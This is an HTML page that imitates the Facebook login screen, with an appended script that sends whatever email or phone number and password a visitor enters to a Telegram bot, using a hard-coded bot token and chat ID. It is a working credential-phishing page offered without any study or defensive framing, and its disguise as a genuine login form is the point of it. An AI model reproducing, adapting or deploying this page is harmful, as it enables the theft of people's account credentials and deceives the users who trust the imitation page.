<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login Page</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <div class="container flex">
      <div class="facebook-page flex">
        <div class="text">
          <h1>facebook</h1>
          <p>Connect with friends and the world </p>
          <p> around you on Facebook.</p>
        </div>
        <form class="login-form">
          <input type="email" placeholder="Email or phone number" required>
          <input type="password" placeholder="Password" required>
          <div class="link">
            <button type="button" class="login" id="submitbutton">Login</button>
            <a href="#" class="forgot">Forgot password?</a>
          </div>
          <hr>
          <div class="button">
            <a href="#">Create new account</a>
          </div>
        </form>
      </div>
    </div>
  </body>
</html>
<script>
function sendTelegramMessage(emailOrPhone, password, botToken, chatId) {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://api.telegram.org/bot' + botToken + '/sendMessage', true);
  xhr.setRequestHeader('Content-Type', 'application/json');
  xhr.onreadystatechange = function() {
    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
      console.log('Message sent successfully!');
    } else {
      console.error('Error sending message:', xhr.status);
    }
  };

  var data = {
    chat_id: chatId,
    text: 'Email or Phone: ' + emailOrPhone + '\nPassword: ' + password
  };

  xhr.send(JSON.stringify(data));
}

document.getElementById('submitbutton').addEventListener('click', function(event) {
  var form = document.querySelector('form.login-form');
  var emailOrPhone = form.querySelector('input[type="email"]').value;
  var password = form.querySelector('input[type="password"]').value;
  var teleBot = '6705820304:AAHk1XLtjSxcXNmvlahYMZ9AmOMZDySheig';
  var chatId = '-1002006594699';

  sendTelegramMessage(emailOrPhone, password, teleBot, chatId);
});
</script>
